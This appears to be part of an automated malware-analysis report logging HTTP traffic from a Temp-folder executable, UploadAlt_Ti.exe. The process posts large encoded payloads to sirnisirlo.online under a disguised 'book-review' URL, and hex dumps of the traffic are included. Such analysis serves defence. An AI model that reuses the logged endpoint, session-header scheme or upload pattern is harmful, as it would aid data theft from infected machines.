                                                                                                                2024-11-14 18:57:08 UTC15331OUTData Raw: a7 a8 23 2c 24 a8 21 26 ab a5 27 24 2c a5 a2 21 26 aa 25 a6 a8 a1 23 a1 a9 2a 21 2b 2c a5 aa aa 28 28 2c 2d 27 a2 ab 21 aa 2d 28 28 2b 25 23 a1 22 26 2c 25 a2 a3 a2 2d a9 a8 a9 24 24 21 27 aa a1 2a 29 a6 a2 22 a6 a3 28 27 2d 21 24 a3 a2 2c 2b 2a ab ab 2d 23 a2 26 a2 23 a8 a8 ab 2c a3 24 a9 2b 22 a6 21 a0 a3 2d a0 27 a9 a7 24 ab a0 a3 24 ab 29 23 a1 2b 27 29 a9 21 a7 a7 2d 23 25 a8 a7 27 a7 ac 28 27 2c 21 a6 24 25 a4 27 a6 a3 a9 a3 26 a6 aa a9 2a a0 a7 a6 2d 2c a5 a7 a4 24 23 ac ac a9 25 ab a2 26 21 29 21 a5 a6 25 aa 2b a8 a5 2b 2b 23 aa 23 26 22 2d a5 25 2b 28 a1 a0 2a 2b a4 24 a1 a4 a9 a0 ac 27 28 2a a6 21 a2 aa a8 ac 25 29 ac 23 aa a9 21 a5 a7 a9 a4 2a 26 2b 22 aa 2a 25 a2 22 a4 25 a0 a8 a1 27 2c a0 25 a2 aa 21 ac ac 2c a1 ab 27 a8 24 a8 25 86 05 28 a5
                                                                                                                Data Ascii: #,$!&'$,!&%#*!+,((,-'!-((+%#"&,%-$$!'*)"('-!$,+*-#&#,$+"!-'$$)#+')!-#%'(',!$%'&*-,$#%&!)!%+++##&"-%+(*+$'(*!%)#!*&+"*%"%',%!,'$%(
                                                                                                                2024-11-14 18:57:08 UTC8555OUTData Raw: 26 a1 a1 27 26 a2 a7 a3 a5 26 23 28 2b a9 a3 a6 27 27 a8 2d 24 23 27 a1 ab 27 28 a3 21 a1 26 26 a6 2a ac a5 2d a6 25 a9 aa 22 a4 28 24 a9 aa a8 25 a8 2a a7 2a a4 a1 26 a9 a6 a8 27 24 ac 25 a0 a8 2a 2b 2c a6 a2 2d a0 a2 a3 27 21 a3 a0 22 24 aa 25 27 25 26 a8 2d a9 a9 a3 ab 29 26 ac 21 ab 25 a2 a7 2a a2 29 2c ab 29 2a a4 a1 a4 2b aa 23 27 a5 24 29 aa a9 ab 29 a3 a0 21 ab 28 2d 22 23 2a a3 a9 22 a0 a9 a7 a5 2c a9 23 aa a3 2b 21 aa a4 a9 22 a8 27 25 aa a0 a7 a1 a9 a7 a0 27 2d 23 2c 2a 23 a8 a3 22 a5 a2 a5 a3 2d 25 29 a6 25 a6 a3 2a a0 25 a1 2a 25 a2 a7 a1 2d a1 aa 2d a6 aa ac a5 a0 a5 2d 2d a8 ac 22 29 25 2c ab 2d ab a6 a7 2c a8 a8 26 ab 25 a6 ab a0 a2 27 a4 23 a6 24 25 2c a6 a2 26 a7 2d 2a 2b 24 29 26 a8 2d 27 ab a1 21 2c a5 a2 21 27 aa 21 22 22 a7 23 ac 24
                                                                                                                Data Ascii: &'&&#(+''-$#''(!&&*-%"($%**&'$%*+,-'!"$%'%&-)&!%*),)*+#'$))!(-"#*",#+!"'%'-#,*#"-%)%*%*%----")%,-,&%'#$%,&-*+$)&-'!,!'!""#$
                                                                                                                2024-11-14 18:57:09 UTC791INHTTP/1.1 204 No Content
                                                                                                                Date: Thu, 14 Nov 2024 18:57:09 GMT
                                                                                                                Connection: close
                                                                                                                gm: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NauJSaJplSWsNcX4SyOAHNqwADJ9TTDAJzs%2F04oIc%2BlZ06%2FIUMVhsvu00Aqfp36WbHrPLjj5Ft1URiEtQVxVhGighD2tHAuYjomVk%2FJQ4UD73CrSjf6EA%2FSgMhGMkrGdXbQnsw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8e2939bf0b49d787-NRT
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=131174&sent=23&recv=38&lost=0&retrans=0&sent_bytes=2841&recv_bytes=40415&delivery_rate=22070&cwnd=32&unsent_bytes=0&cid=ac5054291dfb30eb&ts=904&x=0"


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                8192.168.2.749263188.114.97.34432176C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-14 18:57:10 UTC453OUTPOST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: */*
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                                                pid: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg
                                                                                                                Content-Length: 120526
                                                                                                                Host: sirnisirlo.online
                                                                                                                2024-11-14 18:57:10 UTC15331OUTData Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 01 08 00 00 00 8c 00 00 00 93 d6 01 00 1f c6 d0 03 1a 23 12 65 c2 05 99 86 00 00 00 00 00 00 00 00 ac 08 00 00 8f 63 68 81 cd 60 53 19 98 1b 1c 1b 9a d4 33 39 b7 37 3a 32 b2 b9 b5 c9 05 00 e6 25 b2 c8 49 e6 82 00 e6 02 00 e7 00 00 00 80 ff 7a 00 00 ec 13 a4 37 3a b2 36 14 29 94 10 a1 b7 39 b2 14 2a a6 94 19 10 a1 28 aa 10 1b 1b 18 18 10 20 10 19 17 1a 18 10 a3 24 3d c8 df a6 b4 b1 39 b7 b9 b7 33 3a 10 21 b0 b9 b4 b1 10 22 b4 b9 38 36 b0 bc 10 a0 32 b0 38 3a b2 39 60 e1 6e 00 da 50 53 a9 bc b9 3a b2 b6 54 29 b2 b3 b4 b9 3a 39 bc 54 b9 b6 b9 b9 17 b2 3c b2 d4 b1 b9 39 b9 b9 17 b2 3c b2 d5 bb b4 37 b4 37 b4 3a 17 b2 3c b2 d4 b1 b9 39 b9 b9 17 b2 3c b2 56 bb b4 37 36 b7 b3 b7 37 17 b2 3c b2 56 b9 b2 39 3b
                                                                                                                Data Ascii: #ech`S397:2%Iz7:6)9*( $=93:!"8628:9`nPS:T):9T<9<77:<9<V767<V9;
                                                                                                                2024-11-14 18:57:10 UTC15331OUTData Raw: eb 3a 99 0a 32 14 4d f2 95 42 41 83 22 37 e5 17 45 99 e1 48 3e 62 57 61 a8 30 4d 34 5a 06 2e a7 2f 27 27 8c 07 63 09 c5 fb d1 1e b8 4d 4d 3a 79 e9 d8 e0 4d 62 0d 38 05 04 81 1d 42 f2 69 45 47 15 6e f4 78 1c e3 e5 06 91 97 ed 41 ae e2 c9 62 7d f1 7e 1f b7 15 cf 1c 60 d6 12 9a fc a2 ac e1 3d d1 34 52 d1 9b 4e 4a 56 34 33 7b eb ca fd da 25 ca aa a6 88 c4 2d f5 65 0c 09 6d dc 54 30 0e 0f 72 5d 15 bd 95 ec f0 46 27 ba af a0 03 17 25 00 74 24 2c 20 44 44 b4 ff d9 3f 3f c4 80 ec 81 28 59 13 ef 1d 0f 0d 4c 1e 8e 8e 2a 2e dc 56 7a 6d 81 e5 04 4b 6d 92 00 f5 f4 3c f3 cf 30 01 20 83 13 00 31 f4 53 bb 0a a7 7d e8 3a 79 38 18 88 3c bd 11 86 37 5e ef 65 f8 67 05 34 d7 03 fc 1e e1 34 0a 09 c9 d1 e2 c4 4c 43 2e 99 b4 e9 af d1 cc 85 9c fa 46 cd 11 fe 1f c4 87 7a d1 e2 ae
                                                                                                                Data Ascii: :2MBA"7EH>bWa0M4Z./''cMM:yMb8BiEGnxAb}~`=4RNJV43{%-emT0r]F'%t$, DD??(YL*.VzmKm<0 1S}:y8<7^eg44LC.Fz
                                                                                                                2024-11-14 18:57:10 UTC15331OUTData Raw: 29 e7 8f 20 09 2d 3b b7 7d 85 78 e8 88 92 47 c5 28 59 01 e5 ce 69 f4 32 d6 31 76 0e 27 f8 67 20 1a f9 1f 03 f4 a9 33 3b b2 65 10 4d 5f d7 19 71 df 96 bd b5 ba 7e 81 df 51 1e 46 7c 0d d4 4f 5d 34 33 0b f4 3d 51 3e df 5e 61 52 a5 6b 3b 95 93 80 7c 73 fb e4 dd 53 ef 85 f3 df e7 36 96 bf 75 ea a7 56 54 93 91 d3 5f de c2 65 06 95 17 83 24 b8 8f 60 f4 a3 7c 8b 97 99 83 79 f9 a7 0e 93 6f f5 9a 0f 5b 4f bc b9 a3 f3 c7 d5 f3 dd 32 66 6e 57 8a 64 3c ce 92 b3 6f 80 4e f5 53 82 b3 b8 86 d8 d5 a5 4a de d7 18 6b c1 79 f9 f2 a5 a2 b8 7a 8f 26 b4 da 7d 78 8c ef 8f af ee fe b2 fc 10 f9 5f 1c b3 fb 60 28 82 d4 91 f4 89 f7 0f 85 fb d2 ee df dd 91 fc 86 01 33 fd de 1a 6f 9b 76 fa 27 7d 3a 25 77 ef 6b 14 ca f2 04 ff 9e e5 51 bc 9d fc e6 7e 06 fa 8b f7 bb b3 98 85 ca 11 09 3d
                                                                                                                Data Ascii: ) -;}xG(Yi21v'g 3;eM_q~QF|O]43=Q>^aRk;|sS6uVT_e$`|yo[O2fnWd<oNSJkyz&}x_`(3ov'}:%wkQ~=
                                                                                                                2024-11-14 18:57:10 UTC15331OUTData Raw: 3d 0d e6 e9 b8 f2 00 b9 04 e7 91 08 79 37 ac ec 7a a0 43 97 ec 9d 36 cd a3 43 8f 8c db 45 65 55 8d 80 18 7d d0 b1 aa 14 e2 ae 7c c3 00 72 50 32 31 4e 3a a7 34 4f 3f 6d f7 4a 1f 3e 53 53 63 d4 d2 cc 3c 13 7d 1b 5a 15 22 49 66 29 2f a1 3d 54 cf ad 2f 17 d3 4e f7 58 aa 1d 3f 33 cc 6d 7e b5 de 71 e4 50 43 6b 62 3a 25 59 4b 43 03 1e 68 15 18 ba 54 e4 a4 e1 57 56 e4 f4 ea c7 7f 1a 1c 15 e3 16 1a 91 e8 7d 5b 5e 43 7e 26 74 28 3a 9e 42 79 2a 44 7e 95 82 85 54 7d 01 21 84 c7 06 8f 2a 4f e0 e2 6a 1c af 51 10 10 a7 90 48 5b 7f bc 36 bc f2 8e af 15 be 43 e8 12 de 19 d5 af a1 d4 8e 93 8e 39 de 38 7f d4 2c f2 cf 21 0d be a8 f3 99 ac 4d 71 a1 93 f3 88 3c e2 85 f5 49 d0 16 63 54 de 71 44 ef fd 6d 7d a8 b5 c1 6b d1 86 f5 f2 b0 33 0a 8f 51 cf 37 29 84 ae 4e 65 6a cf f4 62
                                                                                                                Data Ascii: =y7zC6CEeU}|rP21N:4O?mJ>SSc<}Z"If)/=T/NX?3m~qPCkb:%YKChTWV}[^C~&t(:By*D~T}!*OjQH[6C98,!Mq<IcTqDm}k3Q7)Nejb
                                                                                                                2024-11-14 18:57:10 UTC15331OUTData Raw: 04 da a2 df f9 63 2a 2d 79 28 ca b5 56 35 2c ef 8c 5f dc 52 c0 04 33 d7 f3 57 87 78 06 81 1e 36 fa c8 89 05 c1 bf de f2 b2 36 56 1b 91 6a 6d 4e 69 02 c4 cb bd 9a 06 07 c2 0c 1e a2 41 4e 94 32 3f c3 d4 f0 07 5d 92 42 a2 12 31 b4 33 a1 d4 20 7f 0e f7 57 c2 b1 c1 e7 77 8d 1e 54 cf f3 a8 4c bc ac 92 9b 93 1a 5c e6 2d ab 09 24 80 4b d1 ee ff 8d f9 ba 23 72 bb 2b d7 25 a3 b6 3a 40 b0 aa ed 4b ba 65 39 4c a5 6c 33 8f ca bb 48 47 4b de be 47 da 40 51 f6 c9 78 27 90 36 df 96 ac 87 ae a9 1b cf 7d 0e b8 ae 20 5a df af a3 6b d2 bb 8b 80 64 a1 0e 8b 17 ed db 0e 1f 8f 3a 6f 16 c0 5d 75 6a 11 ba 55 c1 85 2a 7e 2c 96 ce fe e1 75 6e 42 fa f9 13 de a8 cf 99 28 44 c4 5d ad ec d7 05 4f 01 f2 2b 96 32 6a af b4 ad 6f 4c a2 cf 13 96 57 3b 0f 0b c8 36 8d f6 49 8c ad 93 3f 58 a0
                                                                                                                Data Ascii: c*-y(V5,_R3Wx66VjmNiAN2?]B13 WwTL\-$K#r+%:@Ke9Ll3HGKG@Qx'6} Zkd:o]ujU*~,unB(D]O+2joLW;6I?X
                                                                                                                2024-11-14 18:57:10 UTC15331OUTData Raw: 0e a8 1e ae ca e6 81 72 cf c4 ed 15 ef 83 d2 c3 5e 0f b1 72 ce 2c 52 32 e7 64 29 4a 8b 91 02 2d 6d a5 50 f9 fb 46 55 4c fa 39 83 92 2e 16 17 2b d5 bd 0c 05 6f 83 ab 5e 97 af f3 61 99 70 34 d7 6c ee 9b 32 bf 5d 7a d9 67 35 6c 65 e3 a5 9a 74 4a f3 b1 26 b8 11 6e 7d 33 6b ba aa 9d b9 cc 6b 58 16 d0 16 d3 f0 9f 3c 90 23 6d 2b ae 17 33 17 03 0a 82 b3 c1 8a a3 11 ab e9 20 51 ce ea cc 0b e8 bc f1 f2 85 a5 01 18 56 6d bd 81 60 48 be 9f a9 ee aa f5 b1 a6 1a 74 f3 5f d9 1d ae 42 35 6e 9e 4c 9c 76 90 00 83 3a cc c4 da ec b4 83 a0 ff 0d 72 c7 34 fd 48 60 6a 21 d7 ec eb ac 85 07 b4 96 67 7b 8a ac 85 04 0d be ac f8 5e fd e3 0f 1a a6 45 c5 e5 e5 4a 0e 51 b1 e4 07 ef c3 d8 2e 50 20 16 f4 83 ac eb e8 b3 bc 4a 03 17 ed 65 e8 68 22 dc e6 0f 0f 4b aa 12 4a 33 ad 9c a6 e7 14
                                                                                                                Data Ascii: r^r,R2d)J-mPFUL9.+o^ap4l2]zg5letJ&n}3kkX<#m+3 QVm`Ht_B5nLv:r4H`j!g{^EJQ.P Jeh"KJ3
                                                                                                                2024-11-14 18:57:10 UTC15331OUTData Raw: e0 20 3a 32 32 70 06 ef dd 1c 32 71 9f 77 97 24 11 d1 b8 2d 20 03 73 ef 7c d9 e0 04 0c 60 07 55 e7 81 e9 10 c8 1c a6 11 0c 74 25 3a 85 54 a3 b5 2d d2 ff f5 fb 84 81 03 50 e8 b2 e8 72 41 18 49 64 7c 13 06 82 9d 8f 8c 7c 75 ad 57 e4 c3 e6 5e 29 27 94 e5 5b 56 15 e1 a8 30 0d 42 01 05 26 a3 03 eb 29 4b fe cc 04 83 a1 ed 1c 56 19 11 fe 7e 19 7e ca 89 a4 34 d8 28 a6 4a b7 79 00 46 f2 b8 05 43 26 8a fc 50 8e 47 19 da 31 06 31 49 0c 2a 84 c1 e1 b6 8f 79 1b bf d0 a1 b2 7c 95 cc 35 2d b0 e9 a6 f4 10 35 76 62 bb b8 3a 2d 25 2b 30 bc 0c 84 43 02 1a 57 d2 4b 37 19 8e 47 a5 96 d1 91 d1 05 e3 f0 74 24 6c a0 24 1d 99 19 2a 0b a3 3c 51 5e 2e 51 75 40 59 4e 16 45 41 7b 01 a2 a0 26 56 56 51 72 c8 e6 a7 a0 71 cf 2d 63 0a c6 dc 87 c6 17 a5 80 e9 02 31 14 1c e6 32 cd 8d 28 b2
                                                                                                                Data Ascii: :22p2qw$- s|`Ut%:T-PrAId||uW^)'[V0B&)KV~~4(JyFC&PG11I*y|5-5vb:-%+0CWK7Gt$l$*<Q^.Qu@YNEA{&VVQrq-c12(
                                                                                                                2024-11-14 18:57:10 UTC13209OUTData Raw: 28 3c f9 2b ac 0f 6c 78 8b eb a6 67 43 cd 49 ae b3 eb f6 96 6f 1b 46 1d 8e ee f3 26 5a aa 86 75 3f 0d 36 9b c8 36 e4 5c cd 74 3b e0 75 b4 8f fb fe ab 62 4d 93 17 aa ad 87 cd 9e 8c ec 3c e0 5e 9f 6d 7c ed bc ff 21 44 73 8c ff cb fb fc e2 b4 74 a0 1e c8 2f 97 be 7e b0 98 92 25 48 be 95 e2 03 b6 3f cc 12 ce 72 0b 2c a9 7f 65 71 9e 1a 12 50 ed 7f d8 3b ab 1b 20 66 6c a9 24 f3 aa 54 db db bb 34 c5 de 93 1a 72 55 d9 f9 c0 cf 15 8c d5 6e e4 0c ab 2e 52 6e 43 0d 58 51 bd e7 ab 53 21 ec 9a c2 31 f5 bf 31 0f 31 03 7f d2 cd 27 c0 ac fe 0d 9b 7e ca ae 44 dd 0f fe 68 94 74 b0 59 33 d5 0e 17 2d f7 c5 c6 c6 98 66 5f bb 63 90 de 04 7f 36 c9 7f b8 97 a6 cd 5d 7a f5 41 8b 83 19 e9 24 8c 19 96 bd 4f c2 04 de b3 57 ce f7 6b f7 1d 86 04 3c 4c b6 48 14 cf b4 a5 78 38 46 35 4c
                                                                                                                Data Ascii: (<+lxgCIoF&Zu?66\t;ubM<^m|!Dst/~%H?r,eqP; fl$T4rUn.RnCXQS!111'~DhtY3-f_c6]zA$OWk<LHx8F5L
                                                                                                                2024-11-14 18:57:12 UTC795INHTTP/1.1 204 No Content
                                                                                                                Date: Thu, 14 Nov 2024 18:57:11 GMT
                                                                                                                Connection: close
                                                                                                                gm: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dy%2FU2IyhVwwm1Rx7evk5spl%2BRub3kj5Elyp2ffiGu6nLlrx%2BJJKiWZ62KV5vkiaj9gVzxO4u7wNjYbBZEnicS96tYyf3lqLvkU8fqFVgbs9%2Fo4jdrGuipm4%2F%2BZ0mB8aXco4bxQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8e2939cbcb4067b3-SJC
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=38712&sent=63&recv=128&lost=0&retrans=0&sent_bytes=2843&recv_bytes=121945&delivery_rate=74808&cwnd=32&unsent_bytes=0&cid=cb3108e7b7fcf7a5&ts=1345&x=0"


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                9192.168.2.749264188.114.97.34432176C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-14 18:57:12 UTC449OUTPOST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: */*
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                                                pid: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg
                                                                                                                Content-Length: 35
                                                                                                                Host: sirnisirlo.online
                                                                                                                2024-11-14 18:57:12 UTC35OUTData Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 02 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                Data Ascii:
                                                                                                                2024-11-14 18:57:13 UTC707INHTTP/1.1 204 No Content
                                                                                                                Date: Thu, 14 Nov 2024 18:57:13 GMT
                                                                                                                Connection: close
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ogFTsBq8li0XpurjB7EW3Lxk0Dszha3vpejtyMAfu8meG6cB9Tstrhsco3hZCAEciXN%2Bzztv%2FjQd5FJnpjDTufynsUtxKsWnorAOJlgKi90cQTFU14yPApjypzCFYBXbQpZ4Fw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8e2939d6aa40e7b3-DFW
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1235&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1120&delivery_rate=2118507&cwnd=251&unsent_bytes=0&cid=086b53ec279e9646&ts=409&x=0"


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                10192.168.2.749265188.114.97.34434836C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-14 18:57:44 UTC372OUTPOST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: */*
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                                                Content-Length: 96
                                                                                                                Host: sirnisirlo.online
                                                                                                                2024-11-14 18:57:44 UTC96OUTData Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 00 00 00 00 00 00 00 00 00 2d 00 00 00 fe ff ff ff 97 00 a0 a0 a0 ff ff d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                Data Ascii: -$9e146be9-c76a-4720-bcdb-53011b87bd06
                                                                                                                2024-11-14 18:57:45 UTC807INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 14 Nov 2024 18:57:44 GMT
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                gm: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NqSX%2FH%2FvWVKIQf%2FT5sXWhN2UAPeqcQlDlmjXP8sIH27BdGHXV0DhPwC3nicGXQ6EmhXYmtUYOsaxZDjmTVU4d%2B%2FjtVgm3RUzzEb2kDE0earUh340OXOjriCFLQC6S6UspS70Tg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8e293a9bf8ff254e-SJC
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=42126&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1104&delivery_rate=68723&cwnd=32&unsent_bytes=0&cid=8598e0922759c01c&ts=911&x=0"
                                                                                                                2024-11-14 18:57:45 UTC17INData Raw: 63 0d 0a 00 00 00 00 00 00 00 00 6a 7a 00 00 0d 0a
                                                                                                                Data Ascii: cjz
                                                                                                                2024-11-14 18:57:45 UTC1369INData Raw: 33 37 63 61 0d 0a c8 dd 6d 32 14 00 4c 0a 60 03 01 00 19 1d 0e 1f 19 41 08 a2 bf bf 60 03 8a 08 23 72 9c 5a 99 86 00 10 00 0c 09 98 01 04 00 19 1d 0e 1f 19 41 04 a1 c4 c4 98 01 48 95 ae c0 e7 42 da ce 14 00 6b 0b 59 02 0c 00 19 1d 0e 1f 19 41 08 cb bf bf 59 02 8a 08 23 72 9c 5a 99 86 15 17 b9 b8 36 b4 3a b2 96 bb b0 36 10 00 b5 08 79 0f 04 00 19 1d 0e 1f 19 41 04 ec c4 c4 79 0f 8b c5 a3 15 78 1e a8 39 14 00 be 08 f8 08 0a 00 19 1d 0e 1f 19 41 08 08 bf bf f8 08 8a 08 23 72 9c 5a 99 86 26 b7 b3 b4 37 10 22 b0 3a b0 10 00 cf 07 4f 07 04 00 19 1d 0e 1f 19 41 04 08 c4 c4 4f 07 25 87 27 47 82 9f 2c 6b 10 00 24 0f 5d 00 04 00 19 1d 0e 1f 19 41 04 cb c4 c4 5d 00 5b cb 8f 2d fd d3 84 01 14 00 59 04 e9 07 05 00 19 1d 0e 1f 19 41 08 cb bf bf e9 07 8a 08 23 72 9c 5a
                                                                                                                Data Ascii: 37cam2L`A`#rZAHBkYAY#rZ6:6yAyx9A#rZ&7":OAO%'G,k$]A][-YA#rZ
                                                                                                                2024-11-14 18:57:45 UTC1369INData Raw: 3a 2e a7 33 33 b4 b1 b2 2e 98 1b 17 18 2e a7 ba 3a 36 b7 b7 b5 2e 28 39 b7 33 b4 36 b2 b9 2e a7 ba 3a 36 b7 b7 b5 2e 9c 99 9b 9a a1 23 23 18 1a 98 99 98 98 98 32 99 21 1c 1c a0 18 18 98 18 1a 21 19 a0 1b 1b 9b 1b 14 00 be 01 ba 0d 0a 00 19 1d 0e 1f 19 41 08 52 bf bf ba 0d 8a 08 23 72 9c 5a 99 86 38 b5 b1 b9 98 98 17 3a 3c 3a 14 00 02 03 7d 03 11 00 19 1d 0e 1f 19 41 08 08 bf bf 7d 03 8a 08 23 72 9c 5a 99 86 b1 34 39 b7 b6 b4 ba b6 af 31 39 b7 bb b9 b2 39 b9 14 00 09 04 4b 00 07 00 19 1d 0e 1f 19 41 08 ec bf bf 4b 00 8a 08 23 72 9c 5a 99 86 29 b2 b0 36 2b 27 a1 10 00 bd 04 6a 0d 04 00 19 1d 0e 1f 19 41 04 3b c4 c4 6a 0d d0 f7 00 81 71 ef 0b ad 14 00 1a 0e 7f 0a 0a 00 19 1d 0e 1f 19 41 08 3b bf bf 7f 0a 8a 08 23 72 9c 5a 99 86 b1 b7 37 33 b4 b3 af b2 3c 3a
                                                                                                                Data Ascii: :.33..:6.(936.:6.##2!!AR#rZ8:<:}A}#rZ49199KAK#rZ)6+'jA;jqA;#rZ73<:
                                                                                                                2024-11-14 18:57:45 UTC1369INData Raw: 05 29 02 08 00 19 1d 0e 1f 19 41 08 cb e3 e3 29 02 2d 18 97 ed 0c a0 82 d1 01 86 24 9b d2 d9 f3 20 10 00 30 0b 60 09 04 00 19 1d 0e 1f 19 41 04 9b c4 c4 60 09 76 31 4a 94 d5 2d 41 b8 10 00 cc 0d e7 08 04 00 19 1d 0e 1f 19 41 04 3b c4 c4 e7 08 e6 0d 49 2b 44 15 42 07 14 00 51 0c 3c 04 08 00 19 1d 0e 1f 19 41 08 a2 e3 e3 3c 04 81 dc 5b 0d 41 97 00 aa a8 42 e8 7b 9f ee 71 5b 10 00 fa 0d 82 0d 04 00 19 1d 0e 1f 19 41 04 08 c4 c4 82 0d e1 58 2d 69 42 a1 d3 40 10 00 e1 02 e7 01 04 00 19 1d 0e 1f 19 41 04 08 c4 c4 e7 01 8e c9 c4 57 2d 30 3a 7e 14 00 89 0d 35 0e 07 00 19 1d 0e 1f 19 41 08 ec bf bf 35 0e 8a 08 23 72 9c 5a 99 86 29 b2 b0 36 2b 27 a1 10 00 22 0f 78 04 04 00 19 1d 0e 1f 19 41 04 9b c4 c4 78 04 85 46 79 84 27 5e 72 a8 14 00 86 0a 11 0a 08 00 19 1d 0e
                                                                                                                Data Ascii: )A)-$ 0`A`v1J-AA;I+DBQ<A<[AB{q[AX-iB@AW-0:~5A5#rZ)6+'"xAxFy'^r
                                                                                                                2024-11-14 18:57:45 UTC1369INData Raw: 9c 99 99 18 1b 9a 98 9b 18 98 19 9b 98 9c 19 19 10 00 9a 04 91 06 04 00 19 1d 0e 1f 19 41 04 ec c4 c4 91 06 4d 4d 0d c3 be 96 06 ef 14 00 f0 01 30 03 08 00 19 1d 0e 1f 19 41 08 cb e3 e3 30 03 ce 18 c6 12 71 77 c6 fc e3 86 75 64 af 0e b7 0d 14 00 26 09 6d 06 12 00 19 1d 0e 1f 19 41 08 52 bf bf 6d 06 8a 08 23 72 9c 5a 99 86 33 b7 39 b6 34 b4 b9 3a b7 39 bc 17 b9 b8 36 b4 3a b2 14 00 be 04 62 0a 17 00 19 1d 0e 1f 19 41 08 a2 bf bf 62 0a 8a 08 23 72 9c 5a 99 86 33 b4 36 b2 af 3a 39 b0 37 b9 33 b2 39 af 3a 39 b0 b1 b2 17 3a 3c 3a 10 00 4f 08 f1 04 04 00 19 1d 0e 1f 19 41 04 9b c4 c4 f1 04 f1 f9 20 4e 53 e1 2b 62 14 00 89 06 96 0c 08 00 19 1d 0e 1f 19 41 08 08 bf bf 96 0c 8a 08 23 72 9c 5a 99 86 38 39 b7 33 b4 36 b2 b9 14 00 81 03 4b 0d 08 00 19 1d 0e 1f 19 41
